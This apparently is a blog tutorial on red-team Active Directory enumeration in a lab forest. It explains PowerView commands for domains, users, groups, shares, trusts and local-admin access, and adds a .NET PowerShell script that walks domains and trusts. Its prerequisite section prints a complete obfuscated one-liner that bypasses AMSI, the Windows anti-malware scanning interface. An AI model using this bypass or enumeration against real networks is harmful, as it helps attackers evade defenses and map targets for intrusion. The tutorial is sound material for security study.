Red Teaming — AD Enumeration (Domain, Objects & trust)

Red teaming is a crucial aspect of cybersecurity that involves the simulation of real-world cyberattacks to identify vulnerabilities and weaknesses in an organization’s security posture. In this context, red teams attempt to replicate the tactics, techniques, and procedures (TTPs) of real attackers to test an organization’s defenses and uncover potential security gaps. One of the critical steps in the red teaming process is Active Directory (AD) enumeration, which involves identifying and gathering information about the organization’s AD infrastructure. AD enumeration is an essential step in identifying potential attack vectors and finding weaknesses in an organization’s security posture. This essay will explore the topic of red teaming and AD enumeration, discussing the techniques, tools, and best practices that red teams use to identify and exploit AD vulnerabilities.


AD Environment

The following is going to be my test environment.

The forest root (MARVEL.local) has one DC and one computer. The child domain (ALPHA.MARVEL.local) has one DC and two computers.

MARVEL.local

  • DC — Win 2019
  • Computer — win 10

ALPHA.MARVEL.local

  • DC — Win 2016
  • Computer — win 10

We also have a few users on each domain.


Let’s start Enumerating

Prereq

We need to bypass AMSI using the one-liner below.

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Enumeration

1. Get-NetDomain
Get-NetDomain

The Get-NetDomain command is a PowerShell command from the PowerView module, which is a powerful tool designed for Active Directory domain enumeration and privilege escalation. When executed, this command retrieves information about the current domain, including the domain name, domain SID, and the domain controller for the domain.

Additionally, this command provides information on the Trusts for the domain, including the trusted domain names and their respective SID values. It also displays the domain policy settings for the current domain.

Get-NetDomain -Domain MARVEL.local

The Get-NetDomain -Domain MARVEL.local command is a PowerShell command from the PowerView module, which is used to retrieve information about a specific domain in an Active Directory environment. When executed, this command retrieves information about the domain named "MARVEL.local" and returns details such as the domain name, domain SID, domain controller for the domain, and domain policy settings.

2. Get-DomainPolicy

The Get-DomainPolicy command is a PowerShell command from the PowerView module, which is designed for Active Directory domain enumeration and privilege escalation. When executed, this command retrieves information about the domain policy settings for the current domain, such as password policy, lockout policy, and Kerberos policy.

3. Get-NetDomainController

The “Get-NetDomainController” PowerView PowerShell command retrieves information about the domain controllers in the current domain.

4. Get-NetUser

The “Get-NetUser” PowerView PowerShell command retrieves information about the user accounts in the current domain.

You will always find the following accounts by default: Administrator, Guest and krbtgt.

5. Get-NetComputer

The “Get-NetComputer” PowerView PowerShell command retrieves information about the computer accounts in the current domain.

6. Get-NetGroup

The “Get-NetGroup” PowerView PowerShell command retrieves information about the groups in the current domain.

7. Get-NetGroupMember

The “Get-NetGroupMember” PowerView PowerShell command retrieves the members of a specified group in the current domain.

8. Invoke-ShareFinder

The “Invoke-ShareFinder” PowerView PowerShell command searches the current domain for network shares that are accessible to the current user or the specified user account.

9. Get-NetDomainTrust

The “Get-NetDomainTrust” PowerView PowerShell command retrieves information about trusts between the current domain and other domains.

10. Get-NetForest

The “Get-NetForest” PowerView PowerShell command retrieves information about the Active Directory forest that the current domain is a part of.
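To show what Get-NetDomain, Get-NetDomainController, Get-NetDomainTrust and Get-NetForest return under the hood, here is an added example (not from the original post or from PowerView) that walks the forest, its domains, domain controllers and trusts with the built-in .NET System.DirectoryServices.ActiveDirectory classes. It assumes it is run from a domain-joined host in the MARVEL.local forest described above; the property names are the .NET ones, not PowerView's.

```powershell
# Added example, not PowerView code: enumerate the forest, its domains and trusts
# using the .NET classes that PowerView's Get-NetForest / Get-NetDomain /
# Get-NetDomainTrust wrap. Assumes a domain-joined host in MARVEL.local or
# ALPHA.MARVEL.local with line of sight to a DC.
$forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
"Forest: $($forest.Name)  root domain: $($forest.RootDomain.Name)  mode: $($forest.ForestMode)"

foreach ($domain in $forest.Domains) {
    # Parent is $null for the forest root (MARVEL.local), set for the child (ALPHA.MARVEL.local)
    $parent = if ($domain.Parent) { $domain.Parent.Name } else { '(forest root)' }
    "Domain: $($domain.Name)  parent: $parent  mode: $($domain.DomainMode)  PDC: $($domain.PdcRoleOwner.Name)"

    # Equivalent of Get-NetDomainController for this domain
    foreach ($dc in $domain.DomainControllers) {
        "  DC: $($dc.Name)  OS: $($dc.OSVersion)  site: $($dc.SiteName)"
    }

    # Equivalent of Get-NetDomainTrust: parent/child trusts show up here for both domains
    foreach ($trust in $domain.GetAllTrustRelationships()) {
        "  Trust: $($trust.SourceName) -> $($trust.TargetName)  type: $($trust.TrustType)  direction: $($trust.TrustDirection)"
    }
}

# Forest-level trusts (external/forest trusts) are attached to the forest object, not a domain
foreach ($trust in $forest.GetAllTrustRelationships()) {
    "Forest trust: $($trust.SourceName) -> $($trust.TargetName)  type: $($trust.TrustType)  direction: $($trust.TrustDirection)"
}
```

In the lab above you should see MARVEL.local listed as the forest root and ALPHA.MARVEL.local with MARVEL.local as its parent, each with a ParentChild trust pointing at the other.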

11. Invoke-CheckLocalAdminAccess

The “Invoke-CheckLocalAdminAccess” PowerView PowerShell command checks if the current user or a specified user account has administrative access to the specified remote computer(s).


Conclusion

Hay Yay!!!

Please give me a clap if you found it to be useful and follow me to get more security knowledge.

In conclusion, AD enumeration is a crucial process for effectively managing and securing Active Directory environments. By conducting a thorough enumeration, organizations can identify and assess the users, groups, and resources within their AD infrastructure, enabling them to better manage access controls, monitor activity and identify potential security threats. Through the use of various enumeration techniques, such as LDAP queries and PowerShell scripts, administrators can gain visibility into their AD environment and ensure that it is properly configured and secured. However, it is important to note that enumeration should be done with caution, as it can potentially expose sensitive information if not properly secured. Overall, AD enumeration is an essential component of AD management and security and should be regularly conducted to maintain a secure and well-managed environment.